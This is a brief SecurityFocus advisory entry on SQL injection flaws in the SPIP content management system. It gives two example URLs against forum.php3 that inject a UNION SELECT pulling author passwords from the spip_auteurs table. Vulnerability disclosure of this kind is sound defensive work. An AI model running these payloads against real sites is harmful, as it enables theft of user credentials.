SPIP Multiple SQL Injection Vulnerabilities



An exploit is not required.

Example URIs have been provided:


http://wwww.example.com/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/*


http://wwww.example.com/forum.php3?id_article=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/*


 

Privacy Statement
Copyright 2010, SecurityFocus